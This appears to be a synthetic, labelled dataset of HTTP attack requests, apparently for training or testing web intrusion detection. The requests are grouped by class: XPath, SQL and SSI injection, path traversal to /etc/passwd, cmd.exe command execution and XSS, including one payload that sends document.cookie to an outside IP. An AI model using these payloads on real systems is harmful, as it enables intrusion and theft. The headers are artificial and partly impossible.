Cookie: la=<!-- #odbc     connect="15a,eIrisw,dla"     statement="select *   from   naiis"-->;tao1Neymtr0eZeN=4;e6nnnfgym9c=c0d
Cookie2: $Version="59"
Date: Tue, 09 May 06 15:49:26 UTC
ETag: "3aIPKIkua7UPA9S"
Expect: 100-continue
From: 3tcl@stomglfgs.it
If-Modified-Since: Fri, 27 Jan 06 19:24:21 UTC
If-Unmodified-Since: Thu, 25 Nov 04 05:51:15 GMT
If-None-Match: *
If-Range: Fri, 02 Dec 05 24:46:30 CET
Max-Forwards: 4
Pragma: ndnEri=6jrob
Authorization: Basic SG5UOHRjZW06MGNjZ3NrdQ==
Referer: http://www.ozrtmas.uk/0ltsnmo/nette.tiff
User-Agent: Mozilla/0.8 (X11; U; Open BSD i586 5.5; iv-ch; rv:1.3.6) Gecko/61066263
Via: 5.4 www.htwtrno.png
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40741
Start - Id: 49021
class: XPathInjection
GET /soenrvdzo07mwyo8Ee/eEZK6UYim.shtml?xrwhnudnaDb=nTEFkuYV9si&yttexdtcTseeS3f=ee6re&-w@vHMreXP=9787266&7._3DH0KI=fnve&5eihilbchyb=tpa&WjIE3UYtmp4ZD=ttepebxhqi&sieepw=75+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++56952%3D&sVo0Cgp1s4null0=pye5%2F&At@6n1include=oVFNb&etioecoieainS=ndysctxeeoiH9rc HTTP/1.1
Host: www.9Dcs3r4hg.cz:53
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: us-ascii;q=0.2, ks_c_5601-1987;q=0.2
Accept-Encoding: gzip;q=0.1, identity;q=0.7, deflate;q=0.7, compress;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 5.173.173.39
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Thu, 20 Mar 08 03:47:51 UTC
ETag: "hqas.qShK2Qyew_tqh"
Expect: an8s
From: oshet@mw1oE1t.com
If-Modified-Since: Sun, 10 Feb 08 18:26:22 UTC
If-Unmodified-Since: Mon, 15 Jun 09 20:16:34 UTC
If-Match: "Ed3i-XvroSmJ0AiKxP"
If-None-Match: *
If-Range: "ixAobMo0R1bPUaN"
Max-Forwards: 101
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: Digest uri=http://sl78.biz/nNoataok/erltmtm/eln1aaE/trkndnkv.php3
Range: -31
Referer: /towcocl.jsp
TE: chunked;q=0.7,chunked
Trailer: Host
User-Agent: tdaqVdq http://www.Rayi.it
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 729105256131367
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49021
Start - Id: 46438
class: PathTransversal
POST /eSGBQncmtmpERsJ7/tgNDxtc/eaaofnnoaanouo/gvNH8lIO.php? HTTP/1.1
Content-Length: 244
Content-Language: h
Content-Encoding: gzip
Content-Location: /slio4t.php
Content-MD5: RXRlbXNzdGhxaGVkd0V1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 May 09 06:59:51 CET
Host: 110.127.23.6
Connection: close
Accept: text/xml
Accept-Charset: x-mac-hebrew, iso-8859-4, windows-1257
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: nesaNa-nesyii;q=0.4, eandb-inEatvis, 1v3ehghn-ap;q=0.5, t-i;q=0.7
Cookie2: $Version="954"
Date: Sat, 15 Oct 05 12:15:43 GMT
If-Match: *
If-None-Match: "_VJC0VXnL466@HBa9"
If-Range: Sat, 28 Nov 09 11:37:57 UTC
Max-Forwards: 665
Authorization: Basic ZWhhb21kYXo6YTl1cmxl
Referer: /lQora/IxaAotwt.swf
User-Agent: Mozilla/2.6 (compatible; 1frona; WinNT; fqcSqgDerg)
UA-CPU: MIPS
UA-Color: color32
Via: e9aer/6.6 167.82.43.160
Transfer-Encoding: deflate
----: ----------------------------------------

taednvftld=Oasch9&he.q=6&fitvtlphcne=p_3&esl=eQrhhp&2xbmecrp=1&UsunEtsasjona=8fSmduihidinWt&fcttsoodlai51e=803421&tRQeoi8ro=mEWzx_9Zp&2onornhmt3=48182&y6AD08=52787&ysrnerhehdngenl=02206&zrq=thwhsser0e&Xaiqnsxgdzuty=7884671&d0anullumeZk=96516467

End - Id: 46438
Start - Id: 47529
class: XSS
GET /nxbUbEcmFZ0Bvvwm/rllciyptpn6u0n4aete0.php4?otbp7ntK=nC2ZA&nH1ratehel0wi=eil%5C%3DyOxmconnectimgeeval&ais6vya=aalocation%40u%3Crl+ocmdt&thristnnsc4alh=7662584083&AeylF=679789&osratastdheahR=eu+r&E9heanto=GbinHisuHOee3Tppn&anOhfztsL6=44693&tCNtmL35=bto&clroagoe=10&tdzR5Dtr=%3Cmeta+++++http-equiv%3D++%22+++++refresh+%22++content++++%3D++++%22+++++0%3Burl%3Djavascript%3A++%5Balert++%28%27ukseo0gENz%27%29%3B%5D+++%22%3E&ihtdaenE=gI65m9vIBbP HTTP/1.0
Host: www.snlPjOercr.com
Connection: rspte
Accept: text/*, image/*;q=0.8, text/html;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.9
Accept-Language: *
Cache-Control: Tt0it='heshap8o'
Client-ip: 132.186.166.233
Cookie: t0ap37mH45FU=eeqTctitegpnsewam;tjA=ntTuft?3an|;cae=6396;lrfmcel6jc=2454;oaFo=yeeoyfetshalhcTfio
Cookie2: $Version="351"
Date: Sat, 01 May 10 17:24:17 CET
ETag: W/"JkgsIoaRszITfEp5ITc"
Expect: mAnknsm
From: eieolton@oosl.de
If-Modified-Since: Wed, 21 May 08 05:10:26 CET
If-Unmodified-Since: Mon, 22 Aug 05 16:35:29 CET
If-Match: "8DcFhJOOdZC_EXkvefX"
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 5
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM dWVKZW42Uml3cGhOYWhhbzdrbnRvZWFub1A4aTRhcmlhdQ==
Authorization: NTLM cjV1c2VpN3NkYVJpc2RjMnNzb3lhNWRsZTZhdG16ZHl0ZXNib0V5ZWxlT3I=
Range: 924-,916951-
Referer: /ett3v.mp3
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 3.6; ym-re; rv:8.1.1) Gecko/24397753
UA-CPU: MIPS
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 3.8 161.175.57.120, HTTP/1.0 www.rQfs.png, HTTP/1.2 146.111.20.218:8
Transfer-Encoding: gzip
Upgrade: atsa/8.3
Warning: 720 www.pHaeee.js "Emolsthe" "Thu, 01 Jul 04 14:53:32 UTC"
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47529
Start - Id: 39762
class: SSI
GET /BWe0-zSHBo/LON11formKzi/rca4ceatoc8orrq6as2l/eGtaieaahpu.php?yaan=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&oupz9e9ug=ettdr HTTP/1.0
Host: 49.158.255.26
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.5, iso-2022-jp;q=0.3, windows-1253;q=0.8, utf-7;q=0.0, cp-936
Accept-Encoding: *;q=0.5
Accept-Language: howst8lx-heinenne;q=0.6, eteas-ied, oswo1r-p
Cache-Control: no-transform
Client-ip: 39.180.8.168
Cookie: seTwaq=5;5r=dear;bs=Nao;9zetcI=ndrzstyleinsert9access_logaeka
Cookie2: $Version="565"
Date: Wed, 08 Jun 05 04:17:50 GMT
ETag: W/"UOethF6tldF.k9x"
Expect: n5nSosn=i2ymhp;hNortnNe=sseexcj
From: ue5Iadae@vsTB2l.net
If-Modified-Since: Mon, 07 Dec 09 24:51:59 GMT
If-Unmodified-Since: Fri, 14 Oct 05 19:19:52 UTC
If-Match: *
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: Thu, 05 Jul 07 06:36:44 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bm43Z0wzMGl1dXlhZXRhZFRPM0hjYXI2dXM4ak52a3BuYVR4
Authorization: Digest algorithm=MD5
Range: 42-82,601-32,-86
Referer: http://www.iDml.cz/7aLni/ehlhacn5/yxhlN/tce40ot.pdf
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/1.1 (compatible; 597stsne; Linux i586; YeDL; guqlur; a1n8)
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 1.3 www.Qrhtldw.js, 3.1 www.3agkmt.htm
Transfer-Encoding: compress
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39762
Start - Id: 48756
class: XPathInjection
GET /t.vTNwEtsrTA_/lisz/hkrt-Q0bIrioCEecm/7neetO/t0QdHyK2zti1/eto7seem8es/E-X/ox8cg54Bu/lpK/2-gUuLt9passthruPperlHS/b@-v2uMA2/tZjobd3ybidf.mdb?9teniarfsey5T=ctimgphpUo%252e%25&Nei=ro&dtjIrnCl6tOtad=09845&ep=tOeNsieifht&muoeoeHnatml=gzoaxse%27+++or++o9%2F8ei%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D2%5D+++or+++%27orfirjoe%27+++%3D%27&ddkasv=gc6AeVF%40&g7ssrms=y+ee HTTP/1.0
Host: 98.177.89.65
Connection: itneoes
Accept: video/mpeg, text/xml, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: nle76ua-ot;q=0.4, nrEsameh-7yiyg0
Cache-Control: max-age=7619
Client-ip: 149.179.120.37
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="14"
Date: Sun, 21 May 06 07:07:33 UTC
ETag: W/"UE8zeFk_uitRh5X7DiJ-"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Sat, 18 Sep 04 02:51:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Aug 07 02:32:40 CET
Max-Forwards: 0
MIME-Version: 2.5
Pragma: nsauiMHs='i'
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest cnonce="fEhiol"
Range: -9
Referer: /sf5bua.txt
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: enadseUd/7.0.5.4
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 532 201.121.16.113:0328 "sow6hi3ltE" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48756
Start - Id: 41959
class: SqlInjection
GET /uodtrgvTl8n.gif?vliwjqqx5iV=icooSegepsxy&t8t=fZw95%40&nds=4&rHf%uc=3&6aqrajfiwn3srn=lHtoon+is%3F%3Ff&svf=46383+++or++++id%3E2++++or++++ls_id%3C176&dotjNnpfietmaEu=371004983&as=l3dhttphn5%2BL&td=bgsoundscript&Tm=b%5De&gsrz=varbblsmlmze&6NQK0qH0.x=+psdxt&thh1wehtolnth=rhhtaccesxqe4%7Clwindow.open%5Dwheret&ee=bq8R89vv.2&redhMitn=ie6h HTTP/1.1
Host: 223.70.238.230
Connection: close
Accept: video/*, text/*
Accept-Charset: euc-jp;q=0.0, windows-1252, x-mac-turkish, ks_c_5601-1987
Accept-Encoding: deflate, compress;q=0.7, identity, compress
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: no-cache
Client-ip: 241.210.73.73
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="90"
Date: Wed, 07 Oct 09 06:16:44 CET
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Sat, 29 Aug 09 15:01:34 CET
If-Match: "HGuhKkWlm_XcbLAj"
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: "CvJbYmQVJKxHxyfvU"
Max-Forwards: 1217
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="eosOeu"
Range: 170-12,11579-8643,1-
Referer: http://www.siera.com/cbei3oye/gkOomUx/7llush6.fgf
TE: deflate,gzip;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/6.5 (compatible; Konqueror/8.1; Windows NT; eThrnar; vnseruEq)
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41959
Start - Id: 44452
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ueeh.uk
Connection: 7reo
Accept: */*;q=0.7
Accept-Charset: windows-874;q=0.2
Accept-Encoding: *
Accept-Language: X-6u4tztoD;q=0.3, n7esg-Axibsai;q=0.5, evtdajla-wfoghmt
Cache-Control: etayrLtI='afopEi'
Client-ip: 241.65.49.103
Cookie: te=491;Abkw=17
Cookie2: $Version="53"
Date: Fri, 25 Apr 08 18:37:25 CET
ETag: W/"CA.F4LqzUCGLA1Nk"
Expect: m8drat
From: j7edhan@ytphgnbey0.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 001
MIME-Version: 1.4
Pragma: h='t3tomb'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: http://iYhss.ch/duheeoh8/tinvee.mpg
TE: gzip
Trailer: Expect
User-Agent: oYV82tZ http://www.4saooer.uk
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 8.5 www.eacv6h.gif:5699, HTTP/3.6 94.26.125.180
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44452
Start - Id: 35544
class: XPathInjection
PUT /ndAm/DzKRrcptAU/fytdueot7uhhmor/dipNqe/Tgwzetowsaniheeseroq/efre5FvSEuFh/aurvienatt/sc50dc6C5JTlLHjLsO6o/dfZMrAvQ7J-X/2OBN0mYB.oXpassthruce/rerlsnppahasoiilts/srfa.jpeg? HTTP/1.0
Content-Length: 465
Content-Language: r,acnSs
Content-Encoding: deflate
Content-Location: http://Sfhi.be/oina/ehieas.pdf
Content-MD5: Y2Vhcm1naHNvUkNJd2VraA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Feb 04 22:46:00 GMT
Last-Modified: Thu, 08 Feb 07 06:58:41 GMT
Host: 237.53.228.175:80
Connection: close
Accept: application/x-tar;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 20.198.192.186
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sun, 16 Sep 07 06:35:52 GMT
ETag: W/"NVeYXAYynVJ6NfI.SKRd"
Expect: 100-continue
From: Q6fua@alfpse.net
If-Modified-Since: Mon, 15 Jan 07 05:19:48 GMT
If-Unmodified-Since: Sat, 26 Nov 05 05:11:08 UTC
If-Match: "w5zN0vj4csCx6..4"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: *
Max-Forwards: 05
MIME-Version: 7.5
Pragma: kKhM='d'
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest uri=http://www.Jnso2nje.ch/be7spcze/soWxe/wit3/pnebl0t.pdf
Range: -15,703-20624,9752-7
Referer: /eaue3/onfsWh.jpeg
TE: chunked
Trailer: Host
User-Agent: 0l9whgA (mZgwP320@6; oqbxEz; dcB@aE)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 502x021
Via: 9.0 89.46.11.46
Transfer-Encoding: deflate
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eaehh=rdwpa&lr0Ae3ccinnglpA=j7'   or   count( path/child::node()[position(    )=((    i  +    j+k   + l+    1)]  | path/child::*()[position()=(k+1)])=1     or   '2o'= '     o15pieo' or&hxvHuhnbiyhhW=neeleek0e&smanctepyso1qT=<a/9aq15eq de&eonuhIeemxtso=]s;lhtVgb:1gi&oxebm=7n&cCyDe1sr5e=lebqsi90dhicms&whmsttuwsali4o=Saag&tmsmsfsnorts=[&XLeOg4eosl=oianrGrenktwaccess_log>T

End - Id: 35544
Start - Id: 46232
class: PathTransversal
GET /boXR6sR/uayooelsn/fabssnueor/nVGL2vW/XUewsEGvHMJ6-/dM@thAlWKVCj6gRd/Nllhu8mp6iJtghsk/dvVHixiOKHMYbu.oSqXa/hWq4OzeiMLM/uxr6ceern/kipR.09DJep0/execboot.iniA.png?ettia=90014030&hateia=%2Fetc%2Fpasswd&yriwnlhfue=793531&renpiE4cueazow=%27D--%5B7catpttwp-cfee HTTP/1.1
Host: www.aestt.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 239.42.171.202
Cookie: .j0aqC=:;IciEuidaaaiyto=eWzs.e;selitesiliw4a1=624635218
Cookie2: $Version="8"
Date: Mon, 17 Oct 05 05:06:38 UTC
ETag: W/"ST3jGS5xrQZ2inWOP6F"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Wed, 21 May 08 17:48:31 UTC
If-Unmodified-Since: Mon, 24 Sep 07 09:24:24 CET
If-Match: "v.xnbf0VsVMgtCpd7Pvh"
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: Sun, 22 Jun 08 23:13:17 GMT
Max-Forwards: 241
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: http://nbhz8ttg.be/oHtsrreb/tsGyhe/fekta.gif
TE: chunked,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.7 (compatible; MSIE 2.7; Unix; ihmrm65ch)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 131x226
Via: 5.4 www.pncnuio7.css, HTTP/2.0 www.t9iihm.html
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46232
Start - Id: 39183
class: SSI
POST /bintXziNa/rW/dlkW7Us9xNJ/vTpzcdafnT/k1pMkvg5XCP/rSueqfeoo7bhqlo/yeaaeYhSte.css? HTTP/1.1
Content-Length: 71
Content-Language: nwahij,team1aef,ltnt
Content-Encoding: deflate
Content-Location: http://Ahgn.fr/4rk4/trow/1s8oe4a/pthi.jpg
Content-MD5: YmVBaWVzMXRlcmRvbTlqaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 22:51:56 UTC
Last-Modified: Fri, 07 Jul 06 05:59:18 GMT
Host: 50.141.112.175
Connection: zexeE
Accept: image/*;q=0.4, image/*
Accept-Charset: iso-8859-15;q=0.7, isiri-3342, x-mac-chinesesimp;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.74.123.168
Cookie: eeuxehthnifl=hIfskhgn;idGHoUeU=stSahtaccesYchreplacent;5B11.=ema
Cookie2: $Version="261"
Date: Wed, 06 Apr 05 02:38:17 GMT
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Sun, 27 Jan 08 07:38:27 GMT
If-Unmodified-Since: Mon, 20 Nov 06 22:22:52 GMT
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: "utzZOFj.idzt6x4iPjC"
If-Range: Mon, 19 Dec 05 02:18:24 GMT
Max-Forwards: 0
MIME-Version: 4.8
Pragma: gelaM='toifs'
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Digest response="560Bec53720bDF014BF8caFdef03FDe5"
Range: -4,-09852,71-
Referer: /tdF1/e2aarebe/hsqsoem/itrI0z.swf
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 4.7; s8-wt; rv:3.1.5) Gecko/86907117
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: 6.1 146.14.85.104, HTTP/0.2 www.7em6i.png, 7.6 www.ets5i.gif
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~

7Cz2nrcph=RthpSf&hwhenAtbdgas=<!--#echo var="date_gmt"-->

End - Id: 39183
Start - Id: 39850
class: SSI
PUT /uWbAsvxmMqPF3EFi@kz/o@LXmtV/rne3s/divMV7/skr0ius7rr/dIhJM6T/lNVlHFjskjXNDdCbE9/rB32Dy2gA2s6ojAhua/Iy.css? HTTP/1.0
Content-Length: 286
Content-Language: scnes
Content-Encoding: gzip
Content-Location: http://92rmlqA6.gov/c5wg.asp
Content-MD5: dWFhZ3RraG02cHNvcmxpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Feb 07 08:07:18 UTC
Last-Modified: Sun, 30 Aug 09 04:32:37 CET
Host: www.ohte.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: m1-q
Cache-Control: nos=emmcnlSy
Cookie: 5hhfyInaOeajo=<!--  #include     virtual="/etc/httpd/httpd.conf" -->;HEHize=3KVJ
Date: Mon, 16 Feb 04 19:22:15 CET
From: biu6nh@gel86etaot.com
If-Modified-Since: Tue, 26 Sep 06 16:47:09 CET
If-Unmodified-Since: Sat, 18 Sep 04 03:19:56 CET
If-Match: "FGF-7jloQvkktkc75l"
If-None-Match: "uj6UScgP6mHKnVPU"
Max-Forwards: 1
MIME-Version: 9.0
Pragma: st=tbqs
Authorization: Basic U2xlTkVlOmZhbG5rRXQ=
Referer: http://www.4rnt.uk/ttiun/nsttTieo/gd6ett/jlSfyth/aTrhyl.cfm
Trailer: Referer
User-Agent: iSfacerF/8.7
Via: HTTP/9.9 176.201.251.98
Warning: 361 14.205.186.210 "sUfuhrilelbElers" "Sun, 21 Jan 07 21:32:04 GMT"
----: -------------------------------------------

oieaEdeiijgf6=reaneh9h68&rzreyt=acfenIat6&jvE9Np=hRupw&accepth<obtmp&hikoigar2=1080774&mQu1aMbl=(w&d1pibmniahtCn=m3noidexecsehr&mb&alink@VE6cY=58&7riFr=ba6t0c2lho'p5netcatlnc/&l7s=o8pS&iohmftosaliEt=5598&eebz4raeoa=035318&echoUq_Nh=7&t8aiklae=bsrnproshreai A&ce2Q6=rONdvD0P2

End - Id: 39850
Start - Id: 43949
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.s4tt3s1nsh.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese, iso-8859-6;q=0.1, windows-1255
Accept-Encoding: deflate;q=0.9, identity;q=0.4
Accept-Language: E-os, whhcmd-O9
Cache-Control: max-age=44655
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="790"
Date: Tue, 09 Jun 09 04:01:02 UTC
ETag: "Nd4SKGTA_nnaZTH0"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Sun, 15 Jun 08 03:56:56 CET
If-Match: *
If-None-Match: "GK6u7j.@piO0eiyuJAS"
If-Range: Wed, 16 May 07 04:00:05 CET
Max-Forwards: 28
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: e42o tgdbtaS=n2RlHdr9
Range: 2091-214
Referer: /wpolWn9/raal/ie5wh.txt
TE: trailers
Trailer: Via
User-Agent: am0rma
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: FTP/6.5 173.207.86.37:19, 8.1 www.et7on6ie.html, 2.0 254.93.181.148
Transfer-Encoding: caaa
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43949
Start - Id: 47025
class: XSS
GET /sDS2or5/ciTaDRhQiDcU8Imb.jpeg?eidTcdf=%3Cmeta+++++http-equiv+++%3D++++%22+++++refresh+++%22+++content+%3D%22++0%3Burl%3Djavascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F172.178.212.20%2Fonanma.msf%27%2Bdocument.cookie%29%3B%5D++%22++%3E&tn0aaxhhi=eo27Ea7s3hiot HTTP/1.0
Host: www.gt2eiy.ch:1
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.7, utf-7, cp-950;q=0.8, isiri-3342;q=0.4, utf-7;q=0.4
Accept-Encoding: 
Accept-Language: sshwshet-etaqpal;q=0.5
Cache-Control: cnueSr='atte'
Client-ip: 170.28.161.6
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="206"
Date: Thu, 25 Oct 07 05:10:19 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Tue, 03 Feb 04 02:18:57 GMT
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: "ieVx5xDcPhI6G.O-4n"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "szarhDVDUDo.5StC6mV"
Max-Forwards: 2
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: Digest qop=auth-int
Range: -0,714-,0-8516
Referer: http://www.HmLd.ch/9sesv/tsexlDOa.gz
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 7.0; rm-se; rv:0.1.3) Gecko/84895851
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.2 www.lcle.png
